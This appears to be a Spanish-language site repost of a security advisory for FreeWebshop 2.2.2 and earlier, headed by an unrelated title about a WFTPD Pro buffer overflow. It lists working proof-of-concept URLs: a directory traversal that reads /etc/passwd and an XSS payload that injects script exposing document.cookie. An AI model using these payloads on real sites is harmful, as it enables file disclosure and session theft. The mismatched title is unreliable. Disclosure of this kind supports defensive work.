Home

WFTPD Pro Server 3.23 Buffer Overflow

Enviado por OeX el Ju, 09/11/2006 - 19:34.
FreeWebshop <=2.2.2
severity: hight
vendor site: http://www.freewebshop.org/

impact: an anonymous user can access anyfile on the remote server

PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00


xss get :

http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script>


laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit@gmail.com
  • 646 lecturas

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.